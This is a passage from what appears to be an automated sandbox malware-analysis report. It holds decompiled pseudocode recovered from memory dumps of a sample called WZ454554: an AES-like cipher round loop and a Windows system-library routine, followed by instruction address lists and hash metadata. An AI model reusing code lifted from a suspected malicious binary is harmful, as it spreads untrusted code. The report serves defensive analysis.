				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                            0x00402fb0
                            0x00402fbf
                            0x00402fc8
                            0x00402fd6
                            0x00402fda
                            0x00402fe3
                            0x00402ff4
                            0x00402ff7
                            0x00402ffc
                            0x00403005
                            0x00403013
                            0x00403018
                            0x00403021
                            0x00403031
                            0x00403051
                            0x00403054
                            0x00403066
                            0x0040306b
                            0x00403080
                            0x0040309d
                            0x004030a0
                            0x004030b1
                            0x004030c6
                            0x004030e6
                            0x004030e9
                            0x004030fb
                            0x00403119
                            0x00403136
                            0x00403139
                            0x0040314b
                            0x00403160
                            0x00403166
                            0x0040316e
                            0x0040316f
                            0x00403172
                            0x00403180
                            0x00403190
                            0x004031a2
                            0x004031b4
                            0x004031d0
                            0x004031e3
                            0x004031f0
                            0x00403201
                            0x00403218
                            0x0040323a
                            0x0040323d
                            0x0040324e
                            0x00403269
                            0x00403280
                            0x00403283
                            0x00403295
                            0x0040329d
                            0x004032b2
                            0x004032cf
                            0x004032d2
                            0x004032e3
                            0x00403307
                            0x00403317
                            0x0040331a
                            0x0040332c
                            0x00403344
                            0x00403347
                            0x0040335a
                            0x00403367
                            0x00403379
                            0x00403391
                            0x004033b4
                            0x004033b7
                            0x004033c9
                            0x004033de
                            0x004033e4
                            0x004033e4
                            0x004033e7
                            0x004033e7
                            0x00403180
                            0x0040344b
                            0x00403454
                            0x00403462
                            0x004034c0
                            0x004034c9
                            0x004034d7
                            0x00403539
                            0x00403542
                            0x0040354f
                            0x00403552
                            0x0040359e
                            0x004035aa
                            0x004035b3
                            0x004035c0
                            0x004035c7

                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                            • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                            • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE20A0, Relevance: .4, Instructions: 420COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00AE20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0xba8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = L00AE2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = L00AE2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00AB58EC(_t240);
									_t221 =  *0xba5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0xba5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00AF4A2C(0xba6e40, 0xaf4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = L00AD7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xa95c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = L00AEF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = L00AEF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00B37016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00AD2400(_t267 + 0x20);
															}
															L00AD2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00AE2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00AD2280(_t134, 0xba8608);
									__eflags =  *0xba6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										L00ACFFB0(_t198, _t241, 0xba8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0xba6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0xba8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00AE6B90(_t210,  &_v64);
										_t262 =  *0xba8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00AEE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										L00AF97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00AF006A(0xba8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0xba8608);
												E00AFB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0xba6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0xba6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								L00ACFFB0(_t198, _t240, 0xba8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00AF00C2(0xba8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                            0x00ae20a0
                            0x00ae20a8
                            0x00ae20ad
                            0x00ae20b3
                            0x00ae20b8
                            0x00ae20c2
                            0x00ae20c7
                            0x00ae20cb
                            0x00ae20d2
                            0x00ae2263
                            0x00ae2266
                            0x00b25836
                            0x00b25836
                            0x00000000
                            0x00ae226c
                            0x00ae226c
                            0x00ae2270
                            0x00ae2274
                            0x00ae20e2
                            0x00ae20e2
                            0x00ae20e6
                            0x00ae20ee
                            0x00b257dc
                            0x00b257de
                            0x00b257ec
                            0x00b257ec
                            0x00b257f1
                            0x00b257f3
                            0x00b257f8
                            0x00000000
                            0x00b257f8
                            0x00b257e0
                            0x00b257e4
                            0x00b257ea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b257ea
                            0x00ae20f4
                            0x00ae20f4
                            0x00ae20f8
                            0x00ae20f8
                            0x00ae20fc
                            0x00ae2100
                            0x00ae2106
                            0x00ae2201
                            0x00ae2206
                            0x00ae220b
                            0x00ae220e
                            0x00ae22a9
                            0x00ae22ac
                            0x00000000
                            0x00000000
                            0x00ae22b2
                            0x00ae22b5
                            0x00b25801
                            0x00b25806
                            0x00000000
                            0x00000000
                            0x00b25810
                            0x00b25815
                            0x00b25818
                            0x00000000
                            0x00000000
                            0x00b2581e
                            0x00ae22bb
                            0x00ae22bb
                            0x00ae2218
                            0x00ae2218
                            0x00ae221c
                            0x00ae2220
                            0x00ae2222
                            0x00ae22c2
                            0x00ae22c4
                            0x00ae22dc
                            0x00ae22dc
                            0x00ae22e1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ae22e7
                            0x00ae22c8
                            0x00ae22cd
                            0x00ae22d3
                            0x00ae22d6
                            0x00b25823
                            0x00b25825
                            0x00b25827
                            0x00000000
                            0x00000000
                            0x00b2582d
                            0x00000000
                            0x00b2582d
                            0x00000000
                            0x00ae2228
                            0x00ae2228
                            0x00000000
                            0x00ae2228
                            0x00ae2222
                            0x00ae2214
                            0x00ae2214
                            0x00000000
                            0x00ae2114
                            0x00ae2114
                            0x00ae2114
                            0x00ae211a
                            0x00ae211c
                            0x00ae2348
                            0x00ae234d
                            0x00b25840
                            0x00b25845
                            0x00b25848
                            0x00b2584e
                            0x00b2584e
                            0x00b25848
                            0x00ae2353
                            0x00ae2355
                            0x00ae2388
                            0x00ae2388
                            0x00ae2368
                            0x00ae236a
                            0x00ae236c
                            0x00ae238f
                            0x00000000
                            0x00ae236e
                            0x00ae236e
                            0x00ae218e
                            0x00ae218e
                            0x00ae2191
                            0x00ae2195
                            0x00b25a03
                            0x00b25a06
                            0x00b25a0c
                            0x00b25a0f
                            0x00b25a11
                            0x00b25a13
                            0x00b25a13
                            0x00b25a19
                            0x00b25a1f
                            0x00000000
                            0x00ae219b
                            0x00ae219b
                            0x00ae21a0
                            0x00ae2282
                            0x00ae2284
                            0x00ae2284
                            0x00ae2284
                            0x00ae2284
                            0x00ae21a6
                            0x00ae21a9
                            0x00ae21ac
                            0x00ae21ae
                            0x00ae21b3
                            0x00ae228b
                            0x00ae2290
                            0x00ae2379
                            0x00ae2296
                            0x00ae2298
                            0x00ae2298
                            0x00ae2290
                            0x00ae21b9
                            0x00ae21be
                            0x00ae22a2
                            0x00ae22a2
                            0x00ae21c4
                            0x00ae21c8
                            0x00ae21cc
                            0x00ae21d0
                            0x00ae21d4
                            0x00ae21de
                            0x00ae21e3
                            0x00b25a29
                            0x00b25a2c
                            0x00000000
                            0x00000000
                            0x00b25a3b
                            0x00000000
                            0x00ae21e9
                            0x00ae21e9
                            0x00ae21e9
                            0x00ae21ee
                            0x00ae21f1
                            0x00b25a45
                            0x00b25a4b
                            0x00b25a52
                            0x00b25a58
                            0x00b25a5d
                            0x00b25a5f
                            0x00b25a71
                            0x00b25a61
                            0x00b25a6a
                            0x00b25a6a
                            0x00b25a76
                            0x00b25a79
                            0x00b25a7f
                            0x00b25a83
                            0x00b25a85
                            0x00b25a87
                            0x00b25a87
                            0x00b25a8c
                            0x00b25a91
                            0x00b25a97
                            0x00b25a9f
                            0x00b25aa0
                            0x00b25aa1
                            0x00b25aa6
                            0x00b25aab
                            0x00b25ab1
                            0x00b25ab3
                            0x00b25ab9
                            0x00b25aca
                            0x00b25ad4
                            0x00b25ad4
                            0x00b25ade
                            0x00b25ade
                            0x00b25aab
                            0x00b25a79
                            0x00b25a52
                            0x00ae21f7
                            0x00ae21f9
                            0x00ae21fe
                            0x00ae21fe
                            0x00ae21e3
                            0x00ae2195
                            0x00ae236c
                            0x00ae2122
                            0x00ae2122
                            0x00ae2124
                            0x00ae2231
                            0x00ae2236
                            0x00ae2236
                            0x00ae2238
                            0x00ae2238
                            0x00ae2240
                            0x00ae2242
                            0x00ae2244
                            0x00b259fc
                            0x00ae218c
                            0x00ae218c
                            0x00000000
                            0x00ae218c
                            0x00ae224a
                            0x00ae224f
                            0x00ae2256
                            0x00ae2304
                            0x00ae2309
                            0x00ae230f
                            0x00ae231e
                            0x00ae231e
                            0x00ae231e
                            0x00ae2320
                            0x00ae2325
                            0x00ae232a
                            0x00ae232c
                            0x00ae233e
                            0x00ae233e
                            0x00000000
                            0x00ae232c
                            0x00ae2311
                            0x00ae2317
                            0x00ae231a
                            0x00ae231c
                            0x00ae2380
                            0x00ae2380
                            0x00ae2380
                            0x00ae2384
                            0x00000000
                            0x00000000
                            0x00ae2386
                            0x00000000
                            0x00ae231c
                            0x00ae225c
                            0x00ae225c
                            0x00000000
                            0x00ae225c
                            0x00ae212a
                            0x00ae2134
                            0x00ae2138
                            0x00ae213d
                            0x00b25858
                            0x00b25863
                            0x00b25863
                            0x00b25867
                            0x00b2586a
                            0x00000000
                            0x00000000
                            0x00b2586c
                            0x00b2586c
                            0x00b25871
                            0x00b25875
                            0x00b25877
                            0x00b25997
                            0x00b2599c
                            0x00b259a1
                            0x00b259a7
                            0x00b259a7
                            0x00000000
                            0x00b259a7
                            0x00b2587d
                            0x00000000
                            0x00b2588b
                            0x00b2588b
                            0x00b25890
                            0x00b25892
                            0x00b25894
                            0x00b25899
                            0x00b2589b
                            0x00b258a0
                            0x00b258a0
                            0x00b258aa
                            0x00b258b2
                            0x00b258b6
                            0x00b258be
                            0x00b258c6
                            0x00b258c9
                            0x00b2590d
                            0x00b25917
                            0x00b2591a
                            0x00b2591c
                            0x00b25920
                            0x00b25928
                            0x00b2592a
                            0x00b2592c
                            0x00b2592e
                            0x00b2592e
                            0x00b258cb
                            0x00b258cd
                            0x00b258d8
                            0x00b258e0
                            0x00b258f4
                            0x00b258fe
                            0x00b258fe
                            0x00b2593a
                            0x00b2593e
                            0x00b25940
                            0x00b25942
                            0x00000000
                            0x00b25944
                            0x00b25944
                            0x00b25949
                            0x00b2594e
                            0x00b2594e
                            0x00b25953
                            0x00b2595b
                            0x00b25976
                            0x00b25976
                            0x00b2597a
                            0x00b2597f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b25981
                            0x00b25981
                            0x00b25981
                            0x00b25983
                            0x00b25988
                            0x00b2598d
